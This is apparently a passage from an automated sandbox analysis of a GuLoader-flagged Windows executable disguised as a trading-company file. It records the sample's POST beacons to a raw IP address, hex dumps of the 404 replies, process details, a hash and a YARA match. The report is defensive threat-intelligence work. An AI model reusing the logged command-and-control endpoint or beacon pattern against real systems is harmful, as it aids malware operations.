            Content-Key: 976E9D7A
            Content-Length: 163
            Connection: close
            Aug 3, 2021 08:12:30.140487909 CEST5898INHTTP/1.1 404 Not Found
            Date: Tue, 03 Aug 2021 06:12:29 GMT
            Server: Apache
            Connection: close
            Content-Type: text/html; charset=UTF-8
            Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


            Session IDSource IPSource PortDestination IPDestination PortProcess
            3192.168.2.349756185.227.139.1880C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            TimestampkBytes transferredDirectionData
            Aug 3, 2021 08:12:30.628950119 CEST5908OUTPOST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0
            User-Agent: Mozilla/4.08 (Charon; Inferno)
            Host: 185.227.139.18
            Accept: */*
            Content-Type: application/octet-stream
            Content-Encoding: binary
            Content-Key: 976E9D7A
            Content-Length: 163
            Connection: close
            Aug 3, 2021 08:12:31.508862972 CEST5910INHTTP/1.1 404 Not Found
            Date: Tue, 03 Aug 2021 06:12:30 GMT
            Server: Apache
            Connection: close
            Content-Type: text/html; charset=UTF-8
            Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


            Code Manipulations

            Statistics

            Behavior

            Click to jump to process

            System Behavior

            Analysis Process: KHAWATMI CO.IMPORT & EXPORT.exe PID: 5804 Parent PID: 5700

            General

            Start time:08:06:08
            Start date:03/08/2021
            Path:C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
            Imagebase:0x400000
            File size:147456 bytes
            MD5 hash:0153AE8CF4B1F546721332B5CB3F973C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:Visual Basic
            Yara matches:
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Author: Joe Security
            Reputation:low

            Analysis Process: KHAWATMI CO.IMPORT & EXPORT.exe PID: 6316 Parent PID: 5804

            General

            Start time:08:09:12
            Start date:03/08/2021
            Path:C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
            Imagebase:0x400000
            File size:147456 bytes
            MD5 hash:0153AE8CF4B1F546721332B5CB3F973C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            Disassembly

            Code Analysis

            Reset < >